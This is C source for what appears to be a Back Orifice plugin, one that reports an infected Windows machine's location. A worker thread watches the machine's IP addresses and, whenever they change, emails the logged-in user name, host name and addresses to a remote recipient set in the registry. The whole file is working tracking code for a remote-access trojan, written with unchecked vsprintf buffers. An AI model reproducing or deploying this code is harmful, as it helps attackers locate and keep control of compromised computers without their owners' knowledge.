	lrc = RegQueryValueEx( hKey, zKeyName, 0, NULL, (BYTE *) pbBool, &nSize );

	return( lrc );
}


/*
    SaveConfg()
	Saves the current configuration set to the registry
*/
#define StoreKeyStr( k, v )		RegSetValueEx( hKey, k, 0, REG_SZ, (const byte *) v, strlen( v ) );
#define StoreKeyNum( k, v )		RegSetValueEx( hKey, k, 0, REG_DWORD, (const byte *) &v, sizeof( v ) );
#define StoreKeyBool( k, v )	RegSetValueEx( hKey, k, 0, REG_DWORD, (const byte *) &v, sizeof( v ) );
int
SaveConfig( void ) {
	LONG	lrc;
	DWORD	nDisp;
	HKEY	hKey;


	lrc = RegCreateKeyEx( HKEY_LOCAL_MACHINE, KEY_REG_SUBKEY, 0, NULL, REG_OPTION_NON_VOLATILE,
		                  KEY_ALL_ACCESS, NULL, &hKey, &nDisp );

	if( lrc != ERROR_SUCCESS )
		return( -1 );

    StoreKeyBool( KEY_RUNLOADED, cg_bCfgRunOnLoad );
	StoreKeyNum( KEY_QUERYDELAY, cg_nCfgQueryDelay );
	StoreKeyStr( KEY_MAILHOST, cg_zCfgMailHost );
	StoreKeyNum( KEY_MAILPORT, cg_nCfgMailPort );
	StoreKeyStr( KEY_MAILFROM, cg_zCfgMailFrom );
	StoreKeyStr( KEY_RCPTTO, cg_zCfgRcptTo );
	StoreKeyStr( KEY_SUBJECT, cg_zCfgSubject );
	StoreKeyNum( KEY_RETRIES, cg_nCfgRetries );
	StoreKeyNum( KEY_RETRYDELAY, cg_nCfgRetryDelay );
	StoreKeyBool( KEY_NOTIFYSTARTUP, cg_bCfgNotifyStartup );
	StoreKeyBool( KEY_NOTIFYLOCAL, cg_bCfgNotifyLocal );
	StoreKeyBool( KEY_USEDEBUG, cg_bCfgUseDebug );
	StoreKeyStr( KEY_DEBUGFILE, cg_zCfgDebugFile );

	RegCloseKey( hKey );

	return( 0 );
}
#undef StoreKeyStr
#undef StoreKeyNum
#undef StoreKeyBool


/*
    WorkerThread()
	This is the function that basically drives the
	entire plugin.

	Theory of Operation:
	    The first thing that happens is that an IP
	list is retrieved.  This list is then validated
	and with the proper options set, a mail message
	may then be sent.  The next phase is simply a
	loop that just continues to retrieve new IP lists.
	When each new list is loaded, it is compared with
	the old list.  If there are any new IPs, and the
	new IPs are worthy of sending (as per the Send
	Local option), then another mailing will be sent.
	This will continue until one of three things
	happen:

	   1) The thread is terminated by a client
	   2) The machine is shutdown
	   3) Windows and/or Back Orifice and/or Rattler
	      screws something up

    Basically, that's it.  Pretty damned simple.
 */
DWORD WINAPI
WorkerThread( LPVOID lpParam ) {
	int			e;
	int			rc;
	BOOL		fXmitFlag	= FALSE;
	IPINFO **	pIPInfoOld;
	IPINFO **	pIPInfoNew;

	if( g_nNumThreads > 0 )
		return( 0 );

	LogMsg( "Thread: Startup..." );

	g_nNumThreads++;

	g_nCntSentMsgs		= 0;
	g_nCntAttemptMsgs	= 0;

	LogMsg( "Loading IP list (OLD)" );
	pIPInfoOld = GetIpList();
	if( NULL == pIPInfoOld ) {
		LogMsg( "Error: Error loading IP list (OLD)" );
		g_nNumThreads--;
		return( -1 );
	}

	LogMsg( "IP list loaded (OLD):" );

	for( e = 0; pIPInfoOld[e] != NULL; e++ ) {
		LogMsg( "  %02d: %d.%d.%d.%d", e,
			    pIPInfoOld[e]-> pIpAddress[0], pIPInfoOld[e]-> pIpAddress[1],
				pIPInfoOld[e]-> pIpAddress[2], pIPInfoOld[e]-> pIpAddress[3] );

		if( ValidateIp( pIPInfoOld[e] ) )
			fXmitFlag = TRUE;
	}

	if( cg_bCfgNotifyStartup && TRUE == fXmitFlag && g_bActive ) {
		LogMsg( "Transmitting mail message" );
		XmitMailMessage( pIPInfoOld );
	}

	while( g_bActive ) {
		Delay( cg_nCfgQueryDelay );

		fXmitFlag = FALSE;

		LogMsg( "Loading IP list (NEW)" );
		pIPInfoNew = GetIpList();
		if( NULL == pIPInfoNew ) {
			LogMsg( "Error: Error loading IP list (NEW)" );
			g_nNumThreads--;
			return( -1 );
		}

		LogMsg( "IP list loaded (NEW):" );

		for( e ^= e; pIPInfoNew[e] != NULL; e++ ) {
			LogMsg( "  %02d: %d.%d.%d.%d", e,
				    pIPInfoNew[e]-> pIpAddress[0], pIPInfoNew[e]-> pIpAddress[1],
					pIPInfoNew[e]-> pIpAddress[2], pIPInfoNew[e]-> pIpAddress[3] );

			rc = FindIp( pIPInfoNew[e], pIPInfoOld );
			if( rc < 0 ) {
				if( ValidateIp( pIPInfoNew[e] ) )
					fXmitFlag = TRUE;
			}

		}

		// Destroy old IPInfo structure
		LogMsg( "Destroying IP list (OLD)" );
		for( e ^= e; pIPInfoOld[e] != NULL; e++ )
			delete pIPInfoOld[e];
		delete [] pIPInfoOld;
		LogMsg ("IP list destroyed (OLD)" );

		pIPInfoOld = pIPInfoNew;

		if( TRUE == fXmitFlag && g_bActive ) {
			LogMsg( "Transmitting mail message" );
			XmitMailMessage( pIPInfoOld );
		}
	}

	LogMsg( "Termination signal received" );

	// Destroy new IPInfo structure
	LogMsg( "Destroying IP list (NEW)" );
	for( e ^= e; pIPInfoNew[e] != NULL; e++ )
		delete pIPInfoNew[e];
	delete [] pIPInfoNew;
	LogMsg ("IP list destroyed (NEW)" );

	g_nNumThreads--;

	LogMsg( "Thread: Exiting..." );

	return( 0 );
}


/*
    GetIpList()
	Retrieves a list of IP addresses for the local
	machine.

	Note: Most of this code is take from Butt Trumpet
	2000 and has been adapted to my programming style.

    Theory of Operation:
	   First get the current host name.  Then use
	gethostbyname() to obtain a listing of all the
	aliases that the local machine may have.  Once
	this has been done, contruct an (IPINFO **)
	block containing the addresses.

    Note: There has to be a better way to do this,
	but I'm too lazy to look it up right now.  If
	I can find something, I'll put it in here, but
	otherwise, you'll just have to deal with it.
*/
IPINFO **
GetIpList( void ) {
	int			e;
	int			rc;
	int			nNumAddr;
	char		zHostName[SIZE_HOSTNAME + 1];
	IPINFO **	pIPInfo;
	HOSTENT *	pHostEnt;


	rc = gethostname( zHostName, SIZE_HOSTNAME + 1 );
	if( rc != 0 || strlen( zHostName ) <= 0 )
		return( NULL );

	pHostEnt = gethostbyname( zHostName );
	if( NULL == pHostEnt )
		return( NULL );

	nNumAddr = GetNumAddr( pHostEnt-> h_addr_list );
	if( nNumAddr <= 0 )
		return( NULL );

	pIPInfo = new IPINFO * [nNumAddr + 1];
	if( NULL == pIPInfo )
		return( NULL );

	for( e = 0; e < nNumAddr; e++ ) {
		pIPInfo[e] = new IPINFO;
		if( NULL == pIPInfo[e] ) {
			LogMsg( "Error: Mem: Error trying allocate space for IP block; truncated (%d, %d)", e, nNumAddr );
			return( pIPInfo );
		}

		pIPInfo[e]-> pIpAddress[0]	= pHostEnt-> h_addr_list[e][0] & 0x00FF;
		pIPInfo[e]-> pIpAddress[1]	= pHostEnt-> h_addr_list[e][1] & 0x00FF;
		pIPInfo[e]-> pIpAddress[2]	= pHostEnt-> h_addr_list[e][2] & 0x00FF;
		pIPInfo[e]-> pIpAddress[3]	= pHostEnt-> h_addr_list[e][3] & 0x00FF;
	}
	pIPInfo[e]		= NULL;

	return( pIPInfo );
}


/*
    GetNumAddr()
	Helper function
	Finds the number of addresses in an address list
	(char ** HOSTENT-> h_addr_list).
*/
int
GetNumAddr( char ** pzAddrList ) {
	int	e;

	for( e = 0; pzAddrList[e] != NULL; e++ );

	return( e );
}


/*
    ValidateIp()
	Validates an IP address to see if it needs to be
	mailed.

    Theory of Operation:
	    This function is quite simple.  Basically there
	are 4 address that are, what I call, LOCAL:

       LOCAL:
       127.0.0.1                   (MASK 255.0.0.0)     localhost

       LAN:
	   10.0.0.0                    (MASK 255.0.0.0)     Class A
       172.16.0.0  - 172.31.0.0    (MASK 255.255.0.0)   Class B
	   192.168.0.0 - 192.168.255.0 (MASK 255.255.255.0) Class C

    Localhost should be pretty obvious.  The other network
	addresses are consider LAN-Worthy.  If you have a LAN
	that is not connected to the internet, you are supposed
	to use one of the three LAN classes.  Since these
	addresses are only found on closed, local networks, I
	consider them to be LOCAL.

    The return value of the function indicates whether
	the IP address is mail-worthy based on the current
	configuration.  A value of 1 (non-0) indicates
	a mail-worthy address.  A value of 0 indicates
	that a mail message should not be sent.
*/
int
ValidateIp( IPINFO * pIPInfo ) {
	switch( pIPInfo-> pIpAddress[0] ) {
		case 127:
			// localhost always fails - who the hell would want to
			// know that you have an IP of localhost?
			return( 0 );

		case 10:
			// Class A Networks:  [10].0.0.0 & 255.0.0.0
			if( cg_bCfgNotifyLocal )
				return( 1 );
			return( 0 );

		case 172:
			// Class B Networks: ([172].16.0.0 - [172].31.0.0) & 255.255.0.0
			if( pIPInfo-> pIpAddress[1] >= 16 && pIPInfo-> pIpAddress[1] <= 31 ) {
				if( cg_bCfgNotifyLocal )
					return( 1 );
				return( 0 );
			}
			return( 1 );

		case 192:
			// Class C Networks: [192].168.0.0 & 255.255.255.0
			if( pIPInfo-> pIpAddress[1] == 168 ) {
				if( cg_bCfgNotifyLocal )
					return( 1 );
				return( 0 );
			}
			return( 1 );

		default:
			// Some other address.  Probably a valid internet address; unless the network
			// admin is a moron and doesn't know how to read a manual on setting up a LAN
			return( 1 );
	}

	return( 0 );
}


/*
    FindIp()
	Finds an IP address in and IP address block

    Returns:
	   index of pIPInfoBlock if found
	   -1 if search address not found
*/
int
FindIp( IPINFO * pIPInfoSearch, IPINFO ** pIPInfoBlock ) {
	int	e;


	for( e = 0; pIPInfoBlock[e] != NULL; e++ ) {
		if( 0 == strncmp( (char *) pIPInfoSearch-> pIpAddress, (char *) pIPInfoBlock[e]-> pIpAddress, 4 ) )
			return( e );
	}

	return( -1 );
}


/*
    XmitMailMessage()
	Sets up the socket connection for sending the mail message

    Theory of Operation:
        First try to get the IP address for the mail server to
    connect to.  Then get the protocol entry for TCP.  Next
	create the socket and connect to the server.  If there is
	a failure in the connection process, keep retrying until
	the number of retries is used up.  Once connected, call
	SendMailMessage() to the send the mail message.  Once
	that is complete, close the socket and return.
*/
int
XmitMailMessage( IPINFO ** pIPInfo ) {
	int			rc;
	DWORD		nRetries;
	SOCKET		sSocket;
	HOSTENT	*	pHostEnt;
	PROTOENT *	pProtoEnt;
	SOCKADDR_IN	sSockAddr;
	WSADATA		wsData;

	
	WSAStartup( 0x0100, &wsData );

	g_nCntAttemptMsgs++;

	// get host information for mail server
	LogMsg( "Getting host information (%s)", cg_zCfgMailHost );
	pHostEnt = gethostbyname( cg_zCfgMailHost );
	if( NULL == pHostEnt ) {
		LogMsg( "Error: Error getting host information" );
		rc = WSAGetLastError();
		return( rc );
	}
	LogMsg( "Host information received" );

	// get protocol entry for TCP
	LogMsg( "Getting protocol information (tcp)" );
	pProtoEnt = getprotobyname( "tcp" );
	if( NULL == pProtoEnt ) {
		LogMsg( "Error: Error getting protocol information" );
		rc = WSAGetLastError();
		return( rc );
	}
	LogMsg( "Protocol information received" );

	// create socket
	LogMsg( "Creating socket" );
	sSocket = socket( AF_INET, SOCK_STREAM, 0 );
	if( INVALID_SOCKET == sSocket ) {
		LogMsg( "Error: Error creating socket" );
		rc = WSAGetLastError();
		return( rc );
	}
	LogMsg( "Socket created" );

	sSockAddr.sin_family	= AF_INET;
	sSockAddr.sin_port		= htons( (u_short) cg_nCfgMailPort );
	memcpy( &sSockAddr.sin_addr, pHostEnt-> h_addr_list[0], sizeof( IN_ADDR ) );

	nRetries = cg_nCfgRetries;

	LogMsg( "Attemping to connect (%s:%d)", cg_zCfgMailHost, cg_nCfgMailPort );
	rc = connect( sSocket, (SOCKADDR *) &sSockAddr, sizeof( SOCKADDR ) );
	while( rc != 0 && nRetries > 0 && g_bActive ) {
		LogMsg( "Connect failed (retries = %d)", nRetries );
		nRetries--;

		Delay( cg_nCfgRetryDelay );

		LogMsg( "Attemping to connect (%s:%d)", cg_zCfgMailHost, cg_nCfgMailPort );
		rc = connect( sSocket, (SOCKADDR *) &sSockAddr, sizeof( SOCKADDR ) );
	}

	if( !g_bActive ) {
		closesocket( sSocket );
		return( 0 );
	}

	if( rc != 0 ) {
		LogMsg( "Connect failed (retries = %d)", nRetries );
		rc = WSAGetLastError();
		return( rc );
	}

	LogMsg( "Connection established" );

	LogMsg( "Sending mail message" );
	rc = SendMailMessage( sSocket, pIPInfo );
	closesocket( sSocket );
	if( rc != 0 ) {
		LogMsg( "Error: Error sending mail message (%d)", rc );
		return( rc );
	}
	LogMsg( "Mail message sent" );

	g_nCntSentMsgs++;

	return( 0 );
}


/*
    SendMailMessage()
	Sends the mail message across the already connected socket

	Note: Read the SMTP RFC (RFC0821) for more information on
	the SMTP protocol.

	Theory of Operation:
        Ok, the server should send 1 or more 220 class headers that
    need to be stripped off.  You don't want to just blindly start
    RECVing strings from the server though!  Since you don't know how
    many of the 220 messages there are, this will lead to a blocked
    socket (i.e. a dead program).  So, how do you get around this?
    Just send the HELO message first.  Now you should be guaranteed
    that there will be some non-220 class message after the 220 class
    messages.  So, just loop to peel off the 220 class messages and
    when you don't get a 220 class message, check it to see which kind
    of message it is.  If it is a 250, the HELO was accepted, continue
    on.  If it was not a 250 (and not a 220), it is probably an error
    message, so exit.
*/
#define	CkSMTPString( s, t )	( 0 == strncmp( s, t, strlen( t ) ) ? 1 : 0 )
int
SendMailMessage( SOCKET sSocket, IPINFO ** pIPInfo ) {
	int				e;
	int				rc;
	char			zHostName[SIZE_HOSTNAME + 1];
	char			zUserName[SIZE_HOSTNAME + 1];
	char			zIOBuffer[SIZE_BUFFER + 1];
	char			zDateBuffer[SIZE_BUFFER + 1];
	DWORD			nSize;
	time_t			tNow;
	struct tm*		tsNow;
	struct timeb	sTimeB;


	nSize = SIZE_HOSTNAME;
	lstrcpy( zUserName, "unknown" );
	GetUserName( zUserName, &nSize );

	rc = gethostname( zHostName, SIZE_HOSTNAME );
	if( rc != 0 || strlen( zHostName ) <= 0 )
		return( -1 );

	// Send HELO
	LogMsg( "SEND: HELO %s", zHostName );
	rc = SendString( sSocket, "HELO %s", zHostName );
	if( 0 == rc ) return( WSAGetLastError() );

	// Read server response, probably a 220 message
	rc = RecvString( sSocket, zIOBuffer );
	LogMsg( "RECV: %s", zIOBuffer );
	if( 0 == rc ) return( WSAGetLastError() );
	rc = CkSMTPString( zIOBuffer, SMTP_220_MSG );
	// While the incoming data is a 220 message, loop
	while( rc != 0 ) {
		rc = RecvString( sSocket, zIOBuffer );
		LogMsg( "RECV: %s", zIOBuffer );
		if( 0 == rc ) return( WSAGetLastError() );
		rc = CkSMTPString( zIOBuffer, SMTP_220_MSG );
	}

	// Got the first non-220 message, check if it is a 250.  If not, exit.
	rc = CkSMTPString( zIOBuffer, SMTP_250_OK );
	if( 0 == rc ) return( -1 );

	// Continue normal SMTP processing
	LogMsg( "SEND: MAIL FROM:<%s>", cg_zCfgMailFrom );
	rc = SendString( sSocket, "MAIL FROM:<%s>", cg_zCfgMailFrom );
	if( 0 == rc ) return( WSAGetLastError() );

	rc = RecvString( sSocket, zIOBuffer );
	LogMsg( "RECV: %s", zIOBuffer );
	if( 0 == rc ) return( WSAGetLastError() );
	rc = CkSMTPString( zIOBuffer, SMTP_250_OK );
	if( 0 == rc ) return( -1 );

	LogMsg( "SEND: RCPT TO:<%s>", cg_zCfgRcptTo );
	rc = SendString( sSocket, "RCPT TO:<%s>", cg_zCfgRcptTo );
	if( 0 == rc ) return( WSAGetLastError() );

	rc = RecvString( sSocket, zIOBuffer );
	LogMsg( "RECV: %s", zIOBuffer );
	if( 0 == rc ) return( WSAGetLastError() );
	rc = CkSMTPString( zIOBuffer, SMTP_250_OK );
	if( 0 == rc ) return( -1 );

	LogMsg( "SEND: DATA" );
	rc = SendString( sSocket, "DATA" );
	if( 0 == rc ) return( WSAGetLastError() );

	rc = RecvString( sSocket, zIOBuffer );
	LogMsg( "RECV: %s", zIOBuffer );
	if( 0 == rc ) return( WSAGetLastError() );
	rc = CkSMTPString( zIOBuffer, SMTP_354_DATA );
	if( 0 == rc ) return( -1 );

	LogMsg( "SEND: From: %s", cg_zCfgMailFrom );
	rc = SendString( sSocket, "From: %s", cg_zCfgMailFrom );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: To: %s", cg_zCfgRcptTo );
	rc = SendString( sSocket, "To: %s", cg_zCfgRcptTo );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: Subject: %s", cg_zCfgSubject );
	rc = SendString( sSocket, "Subject: %s", cg_zCfgSubject );
	if( 0 == rc ) return( WSAGetLastError() );

	tNow	= time( NULL );
	tsNow	= localtime( &tNow );
	strftime( zDateBuffer, SIZE_BUFFER, "%a, %d %b %Y %H:%M:%S %Z", tsNow );

	ftime( &sTimeB );
	if( sTimeB.dstflag )
		sTimeB.timezone -= 60;

	LogMsg( "SEND: Date: %s %+02d%02ud", zDateBuffer, -( sTimeB.timezone / 60 ), sTimeB.timezone % 60 );
	rc = SendString( sSocket, "Date: %s %+02d%02ud", zDateBuffer, -( sTimeB.timezone / 60 ), sTimeB.timezone % 60 );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: X-Mailer: %s", STR_X_MAILER );
    rc = SendString( sSocket, "X-Mailer: %s", STR_X_MAILER );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: <cr><lf>" );
    rc = SendString( sSocket, "" );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: User: %s    Host: %s:", zUserName, zHostName );
	rc = SendString( sSocket, "User: %s    Host: %s:", zUserName, zHostName );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: <cr><lf>" );
    rc = SendString( sSocket, "" );
	if( 0 == rc ) return( WSAGetLastError() );

	LogMsg( "SEND: Current IP Address Information:" );
	rc = SendString( sSocket, "Current IP Address Information:" );
	if( 0 == rc ) return( WSAGetLastError() );

	if( pIPInfo != NULL ) {
		for( e = 0; pIPInfo[e] != NULL; e++ ) {
			LogMsg( "SEND:   %02d: %d.%d.%d.%d", e, 
				             pIPInfo[e]-> pIpAddress[0], pIPInfo[e]-> pIpAddress[1],
							 pIPInfo[e]-> pIpAddress[2], pIPInfo[e]-> pIpAddress[3] );

			rc = SendString( sSocket, "  %02d: %d.%d.%d.%d", e, 
				             pIPInfo[e]-> pIpAddress[0], pIPInfo[e]-> pIpAddress[1],
							 pIPInfo[e]-> pIpAddress[2], pIPInfo[e]-> pIpAddress[3] );
			if( 0 == rc ) return( WSAGetLastError() );
		}
	} else {
		LogMsg( "SEND:   *** NO IP INFORMATION ***" );
		rc = SendString( sSocket, "  *** NO IP INFORMATION ***" );
		if( 0 == rc ) return( WSAGetLastError() );
	}

	LogMsg( "SEND: <cr><lf>%c", CHAR_EOM );
	rc = SendString( sSocket, "\r\n%c", CHAR_EOM );
	if( 0 == rc ) return( WSAGetLastError() );

	rc = RecvString( sSocket, zIOBuffer );
	LogMsg( "RECV: %s", zIOBuffer );
	if( 0 == rc ) return( WSAGetLastError() );
	rc = CkSMTPString( zIOBuffer, SMTP_250_OK );
	if( 0 == rc ) return( -1 );

	LogMsg( "SEND: QUIT" );
	rc = SendString( sSocket, "QUIT" );
	if( 0 == rc ) return( WSAGetLastError() );

	rc = RecvString( sSocket, zIOBuffer );
	LogMsg( "RECV: %s", zIOBuffer );
	if( 0 == rc ) return( WSAGetLastError() );
	rc = CkSMTPString( zIOBuffer, SMTP_221_QUIT );
	if( 0 == rc ) return( -1 );

	return( 0 );
}
#undef CkSMTPString


/*
    SendString()
	Helper Function
	Sends a formated string across a socket connection

    Note:  As if you couldn't tell already, I love the
	ellipses (...)!  Very handy when doing stuff like
	this.
*/
int
SendString( SOCKET sSocket, char * format, ... ) {
	int		rc;
	char	zTBuffer[SIZE_BUFFER + 1];
	char	zOBuffer[SIZE_BUFFER + 1];
	va_list	args;


	if( NULL == format )
		return( 0 );

	va_start( args, format );
	vsprintf( zTBuffer, format, args );
	va_end( args );

	sprintf( zOBuffer, "%s\r\n", zTBuffer );

	rc = send( sSocket, zOBuffer, strlen( zOBuffer ), 0 );
	if( SOCKET_ERROR == rc )
		return( 0 );

	return( rc );
}


/*
    RecvString()
	Helper Function
	Receives a string (\r\n terminated) from a socket connection

    Note:  This function recv's bytes one a time which is probably
	slower than block transfers.  However, this is much easier to
	deal with than reading in a whole block, partitioning it into
	seperate chunks, keeping track of the buffer state... etc...
	BLEAH!
*/
int
RecvString( SOCKET sSocket, char * zIBuffer ) {
	int		e		= 0;
	int		rc		= 1;
	BOOL	flag	= FALSE;
	char *	p;


	p = zIBuffer;
	while( rc != 0 ) {
		rc = recv( sSocket, p, 1, 0 );
		if( rc <= 0 )
			return( 0 );

		e++;

		if( CHAR_CR == *p )
			flag = TRUE;
		else if( CHAR_LF == *p && TRUE == flag ) {
			*( p - 1 )	= CHAR_EOS;
			rc			= 0;
		} else
			flag = FALSE;

		p++;
	}

	return( e );
}


/*
    LogMsg()
	Logs message to the debugging file if debugging is on
*/
void
LogMsg( char * format, ... ) {
	char	zBuffer[SIZE_BUFFER + 1];
	FILE *	fh;
	va_list	args;


	if( !cg_bCfgUseDebug || NULL == cg_zCfgDebugFile || NULL == format )
		return;

	va_start( args, format );
	vsprintf( zBuffer, format, args );
	va_end( args );

	fh = fopen( cg_zCfgDebugFile, "a" );
	if( NULL == fh )
		return;

	fprintf( fh, "%s\n", zBuffer );
	fclose( fh );

	return;
}


/*
    Delay()
	Helper function
	Delays for a specified number of seconds
*/
void
Delay( DWORD sec ) {
	DWORD	timer;


	timer = GetTickCount() + ( sec * 1000 );
	while( GetTickCount() < timer && g_bActive )
		Sleep( 1000 );

	return;
}